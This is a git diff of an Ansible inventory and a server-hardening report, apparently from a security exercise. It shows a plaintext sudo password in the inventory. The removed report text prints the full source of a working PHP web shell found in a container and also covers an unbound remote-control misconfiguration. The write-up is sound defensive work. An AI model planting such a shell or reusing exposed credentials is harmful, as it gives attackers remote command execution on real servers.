0c57c12ac8
...
512acb8db3
|
@ -5,6 +5,7 @@ all:
|
|||
ansible_connection: ssh
|
||||
ansible_become: yes
|
||||
ansible_become_method: sudo
|
||||
ansible_host: 64.227.120.192
|
||||
ansible_ssh_user: root
|
||||
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ls2024_prep"
|
||||
ansible_host: ml-node
|
||||
ansible_ssh_user: ml-node
|
||||
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ml-node"
|
||||
ansible_become_pass: dobercaj420
|
||||
|
|
105
report/Report.md
105
report/Report.md
|
@ -274,90 +274,6 @@ server {
|
|||
```
|
||||
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
|
||||
|
||||
Lets enable xss protection in the nginx configuration.
|
||||
|
||||
```bash
|
||||
location /2048/ {
|
||||
proxy_pass http://localhost:8018/;
|
||||
proxy_set_header Host $host;
|
||||
# Add security headers
|
||||
add_header X-Frame-Options "SAMEORIGIN";
|
||||
add_header X-Content-Type-Options "nosniff";
|
||||
add_header X-XSS-Protection "1; mode=block";
|
||||
}
|
||||
```
|
||||
|
||||
And deny access to the all `.` files.
|
||||
|
||||
```bash
|
||||
location ~ /\. {
|
||||
deny all;
|
||||
}
|
||||
```
|
||||
|
||||
The process is run by the `conmon` process.
|
||||
|
||||
```bash
|
||||
root@ls-2024-9:~# sudo lsof -i :8018
|
||||
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
||||
conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
|
||||
|
||||
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
|
||||
```
|
||||
|
||||
It is a podman container.
|
||||
|
||||
```bash
|
||||
root@ls-2024-9:~# podman ps
|
||||
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||||
4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
|
||||
root@ls-2024-9:~#
|
||||
```
|
||||
|
||||
When going into the container we can see the php reverse shell script.
|
||||
|
||||
```bash
|
||||
root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
|
||||
root@4d05d4a1a404:/var/www/html# ls
|
||||
app.js assets index.html manifest.json service-worker.js shell.php style.css
|
||||
root@4d05d4a1a404:/var/www/html# cat shell.php
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<title>CMD</title>
|
||||
<style type="text/css">
|
||||
body {
|
||||
background: black;
|
||||
font-family: courier,arial;
|
||||
color: white;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<br/><br/><br/>
|
||||
<center>
|
||||
<form method="POST">
|
||||
<input type="text" name="cmd" placeholder="cmd" size=100/>
|
||||
<input type="submit" value="exec"/>
|
||||
</form>
|
||||
</center>
|
||||
<br/><br/><br/>
|
||||
<?php
|
||||
if(isset($_POST['cmd'])){
|
||||
echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
root@4d05d4a1a404:/var/www/html#
|
||||
```
|
||||
|
||||
Lets remove the file now.
|
||||
|
||||
```bash
|
||||
podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
|
||||
```
|
||||
|
||||
### Already f-up something
|
||||
|
||||
|
@ -462,24 +378,3 @@ Host ls2024_prep
|
|||
|
||||
### DNS
|
||||
|
||||
Problem here is that remote control is enabled and we can use it to get the root shell.
|
||||
|
||||
```txt
|
||||
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
|
||||
# default unbound control
|
||||
remote-control:
|
||||
control-enable: yes
|
||||
control-interface: ::0
|
||||
control-use-cert: no
|
||||
```
|
||||
|
||||
Lets disable remote control completely. and restart the service.
|
||||
|
||||
```bash
|
||||
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
|
||||
```
|
||||
|
||||
This is all I found suspicious in the DNS configuration.
|
||||
|
||||
|
||||
|
||||
|
|